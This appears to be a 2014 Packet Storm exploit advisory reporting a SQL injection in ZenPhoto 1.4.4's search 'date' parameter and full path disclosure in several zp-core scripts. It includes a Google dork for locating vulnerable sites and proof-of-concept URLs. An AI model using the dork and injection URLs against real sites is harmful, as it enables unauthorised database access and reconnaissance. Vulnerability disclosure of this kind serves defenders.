ZenPhoto 1.4.4 Path Disclosure / SQL Injection

2014-01-24T00:00:00
ID PACKETSTORM:124929
Type packetstorm
Reporter KedAns-Dz
Modified 2014-01-24T00:00:00

Description

                                        
                                            `   
###########################################  
#-----------------------------------------#  
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#  
#-----------------------------------------#  
# *----------------------------* #  
# K |....##...##..####...####....| . #  
# h |....#...#........#..#...#...| A #  
# a |....#..#.........#..#....#..| N #  
# l |....###........##...#.....#.| S #  
# E |....#.#..........#..#....#..| e #  
# D |....#..#.........#..#...#...| u #  
# . |....##..##...####...####....| r #  
# *----------------------------* #  
#-----------------------------------------#  
#[ Copyright © 2014 | Dz Offenders Cr3w ]#  
#-----------------------------------------#  
###########################################  
# >> D_x . Made In Algeria . x_Z << #  
######################################################################  
#  
# [>] Title : ZenPhoto v1.4.4 (SQLi/Disclosure) Multiple Vulnerabilities  
#  
# [>] Author : KedAns-Dz  
# [+] E-mail : ked-h (@hotmail.com)  
# [+] FaCeb0ok : fb.me/K3d.Dz  
# [+] TwiTter : @kedans  
#  
# [#] Platform : PHP / WebApp  
# [+] Cat/Tag : SQL Injection , Multiple Full Path Disclosure  
#  
# [<] <3 <3 Greetings t0 Palestine <3 <3  
# [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day  
# [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls  
#  
#######################################################################  
#  
# [!] Description :  
#  
# ZenPhoto version 1.4.4 is suffer from multiple vulnerabilities  
# remote attacker can use some MySQL bug in (&date=) and exploit it  
# as SQL Injection ,and access to some files and get errors with the  
# Full Path of this files and use it to disclosure the target full path.  
#  
# [!] CWE = CWE-89 , CWE-22  
#  
#####  
# [!] Google Dork :   
# intext:"Powered by zenPHOTO"  
#####  
# [+] Exploit (1) ' SQL Injection ' :=>  
#  
# - http://[target]/[path]/index.php?p=search&date='  
# - http://127.0.0.1/zenphoto/index.php?p=search&date=' [SQL Injection]  
#  
# - p.o.c image : (http://oi41.tinypic.com/zme90m.jpg)  
#  
#####  
# [+] Exploit (2) ' Full Path Disclosure ' :   
#  
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/tiny_mce.php  
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_http.php  
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_flash.php  
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_jQuery.php  
# - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_database.php  
# - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_metadata.php  
#  
#######################################################################  
  
####  
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>  
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3  
#---------------------------------------------------------------  
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,  
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,  
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &  
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &  
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &  
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &   
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=  
####  
`